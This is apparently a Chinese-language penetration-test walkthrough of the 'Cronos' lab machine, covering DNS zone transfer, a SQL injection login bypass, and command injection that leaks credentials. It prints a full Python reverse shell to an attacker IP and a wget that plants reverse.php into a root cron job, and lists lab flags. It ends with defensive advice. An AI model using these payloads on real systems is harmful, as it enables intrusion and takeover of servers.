Cronos靶机渗透测试完整指南

信息收集阶段

初始扫描

使用Nmap进行端口扫描：

nmap -p- 10.10.10.13 --min-rate 1000 -sC -sV

扫描结果：

• 22/tcp：OpenSSH 7.2p2 (Ubuntu)
• 53/tcp：ISC BIND 9.10.3-P4 (DNS服务)
• 80/tcp：Apache httpd 2.4.18 (Ubuntu)

DNS枚举

1. 使用nslookup查询DNS信息：

nslookup 10.10.10.13

2. 执行DNS区域传输：

dig axfr @10.10.10.13 cronos.htb

3. 将发现的域名添加到/etc/hosts：

echo '10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb' >> /etc/hosts

Web应用渗透

SQL注入攻击

在登录表单中发现SQL注入漏洞：

• 用户名：admin' or '1'='1
• 密码：任意值（如xxxx）

命令注入RCE

在Web应用中发现命令注入点：

1. 初始测试：

8.8.8.8;ls
8.8.8.8;cat config.php

2. 从配置文件中获取数据库凭据：

username: admin
password: kEjdbRigfBHUREiNSDs

3. 建立反向shell连接：

8.8.8.8;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.24",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

权限提升

用户权限

获取user flag：

7dd961c26e9e724da5ac41a381b8f585

TRP00F自动化提权

使用TRP00F工具进行权限提升：

python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900

Crontab计划任务提权

1. 检查计划任务：

cat /etc/crontab

2. 利用计划任务执行恶意代码：

wget -O /var/www/laravel/artisan http://10.10.16.24/reverse.php

3. 获取root flag：

c5a019884687c3347390940b6ee1eeea

关键知识点总结

1. DNS枚举技术：

   • 区域传输攻击(DNS AXFR)
   • 子域名枚举

2. Web应用漏洞：

   • SQL注入绕过认证
   • 命令注入实现RCE
   • 配置文件泄露敏感信息

3. 权限提升方法：

   • 自动化提权工具TRP00F的使用
   • 利用计划任务(Crontab)进行权限提升
   • 文件覆盖攻击

4. 后渗透技巧：

   • Python反向shell构造
   • 计划任务监控与利用
   • 低权限到高权限的横向移动

防御建议

1. 配置DNS服务器禁用区域传输
2. 对用户输入进行严格过滤，防止SQL注入和命令注入
3. 定期更新系统和应用软件
4. 限制计划任务的执行权限
5. 对敏感配置文件设置适当权限
6. 实施最小权限原则